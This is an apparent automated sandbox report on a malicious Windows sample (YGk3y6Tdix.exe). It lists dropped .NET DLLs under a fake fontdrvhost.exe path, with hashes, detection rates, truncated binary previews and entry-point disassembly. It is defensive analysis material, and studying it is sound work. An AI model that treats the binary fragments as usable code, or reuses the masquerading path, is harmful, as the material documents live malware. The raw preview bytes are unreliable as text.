                                                                                                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):23552
                                                                                                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                                            Entropy (8bit):5.0168086460579095
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                                                                                            MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                                                                                            SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                                                                                            SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                                                                                            SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):32256
                                                                                                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                            Entropy (8bit):5.41854385721431
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):32256
                                                                                                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                                            Entropy (8bit):5.0168086460579095
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                                                                                            MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                                                                                            SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                                                                                            SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                                                                                            SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                            Entropy (8bit):5.41854385721431
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):23552
                                                                                                                                                                                            Entropy (8bit):5.529329139831718
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                                            MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                                            SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                                            SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                                            SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):23552
                                                                                                                                                                                            Entropy (8bit):5.529329139831718
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                                            MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                                            SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                                            SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                                            SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1991168
                                                                                                                                                                                            Entropy (8bit):7.5618921450859276
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
                                                                                                                                                                                            MD5:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            SHA1:9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
                                                                                                                                                                                            SHA-256:62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
                                                                                                                                                                                            SHA-512:296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9...*...8....*(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (588), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):588
                                                                                                                                                                                            Entropy (8bit):5.890203161219501
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:s7EGPDrRk3+Amm1IR1vQdLr1T+Ic20SMxCjVBbigYixeiS9mcMn:70C+AbIRRQR9+8AdgDCmcM
                                                                                                                                                                                            MD5:A9EEFFD05D92E327CA8F367CB0CA5E7B
                                                                                                                                                                                            SHA1:ACF91F84222CC4EBA2AD2B625EE47FB0EA6EED00
                                                                                                                                                                                            SHA-256:74C0C0819242F05E6D55311B01E95FD9FFB73E1B3F0C393F354CA9A2194A557A
                                                                                                                                                                                            SHA-512:1751323A8B59F4B95F1CEF8A0FEA20171B34028534388BD4F44DF84596A8130C7CB83CBC38E1DE9EB5D55AFA5A5971E1C9BE11B6D8A5AD2FAF7681AF94ECB3D2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:HeYbwQuWzmdIvVPrzb42pQ8DKH5eAls4jw7vLUQSD4tGChswMbqZHW40fVQpVPVN3ij9YegeLmyuh2AnZIRi5TwN1GQzEk6xifNd7sYs5LOfhKSmUmQM7xSjvWIROqakpALCphpqujntERpqynebUtzvNnrljGdOvnzh8Q7x7jcYJifeqcdkL8Q6KayBzDGoFY8bcIshpreuRblpIN5Hm2CxX3Wib583dxSvjDBiu65eefosyJ3lI8BNVLDjwJFttkReJ0FEMWXq7iS2PntSCWuevFZYAcwk0Lv3OJj7DzZvlVPx2KUIZxrWzwsEbqDukxzwxZoFEwON793azmg0HnKDeYEbbegWvoLxfdAdgPDnieY03SOzKNm6nwRYUMnjQ2bSxF4WmDT2kgeAANhIPqMiCOKsLlIUldXqCFCyY2NH3tWGRRXHofUjp3Pj4LKA59RGJy74LtuXdEoT1Eb3NApFJxAJzc4MsNM4bQ7dUd65u6GkO6szuRw4TL6VxxEsyhpP2t1kH7juEuUNqZ43uEcaaRlPUlpgYOGMR0reEHswrBzi1toY2L7uFOzkIlPfSCW0oH50raym
                                                                                                                                                                                            Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):502
                                                                                                                                                                                            Entropy (8bit):4.618543484589417
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:PrS5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:gdUOAokItULVDv
                                                                                                                                                                                            MD5:4DBEFFEDC5A0C766CC738CB031B97382
                                                                                                                                                                                            SHA1:A28348DF32AE7C992201A7893DDCCE39638F5DB6
                                                                                                                                                                                            SHA-256:D1C202BA26D1A32C2060CF1231E5CDA0621E84DB3EE32985C7151E0A2E2D081F
                                                                                                                                                                                            SHA-512:ACE73ECFFCCF8775525BD45FDDE356AE95FD8ED293F079E10AC7ECD0575EB302EF96AF9297BEFEE017120659CC598C4F33272A3A052D1951574776234A127709
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..Pinging 571345 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Entropy (8bit):7.498817961639936
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:YGk3y6Tdix.exe
                                                                                                                                                                                            File size:2'312'934 bytes
                                                                                                                                                                                            MD5:e38b0fc914530e6682d067159b0c7c34
                                                                                                                                                                                            SHA1:4661a00c6e199b1277b2af3bb72e5ebc22cbe2d3
                                                                                                                                                                                            SHA256:476f2ddc0f7c7ef512c71a6faadfead61424d57abf2e4566d48b8dd84545c6cb
                                                                                                                                                                                            SHA512:2a3fbec39991a98808e30ae453cfd9ff7b77f20af5821e4cc0167553e4df687e1ada2c1e35f4b9168f276789029b0de6aa5c11e34b58926ac6e0b6a80046c9d4
                                                                                                                                                                                            SSDEEP:49152:IBJ3j0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8ZM:ylj0voZ4YqIdCho9YLi6lG+ZM
                                                                                                                                                                                            TLSH:0DB5BF0679928F73C2615732866B163D42A0D7263A22EF1B375F10D2AD177F19E722B3
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                                                                                                                            Icon Hash:1515d4d4442f2d2d
                                                                                                                                                                                            Entrypoint:0x41f530
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                                                                                            Instruction
                                                                                                                                                                                            call 00007F368483D0DBh
                                                                                                                                                                                            jmp 00007F368483C9EDh
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                            mov esi, ecx
                                                                                                                                                                                            call 00007F368482F837h
                                                                                                                                                                                            mov dword ptr [esi], 004356D0h
                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                            pop esi
                                                                                                                                                                                            pop ebp
                                                                                                                                                                                            retn 0004h
                                                                                                                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                            mov dword ptr [ecx+04h], 004356D8h
                                                                                                                                                                                            mov dword ptr [ecx], 004356D0h
                                                                                                                                                                                            ret
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            push esi
                                                                                                                                                                                            mov esi, ecx
                                                                                                                                                                                            lea eax, dword ptr [esi+04h]
                                                                                                                                                                                            mov dword ptr [esi], 004356B8h
                                                                                                                                                                                            push eax
                                                                                                                                                                                            call 00007F368483FE7Fh
                                                                                                                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            je 00007F368483CB7Ch
                                                                                                                                                                                            push 0000000Ch
                                                                                                                                                                                            push esi
                                                                                                                                                                                            call 00007F368483C139h
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                            pop esi
                                                                                                                                                                                            pop ebp
                                                                                                                                                                                            retn 0004h
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            sub esp, 0Ch
                                                                                                                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                            call 00007F368482F7B2h
                                                                                                                                                                                            push 0043BEF0h
                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            call 00007F368483F939h
                                                                                                                                                                                            int3
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            sub esp, 0Ch
                                                                                                                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                            call 00007F368483CAF8h
                                                                                                                                                                                            push 0043C0F4h
                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            call 00007F368483F91Ch
                                                                                                                                                                                            int3
                                                                                                                                                                                            jmp 00007F36848413B7h
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            push 00422900h
                                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
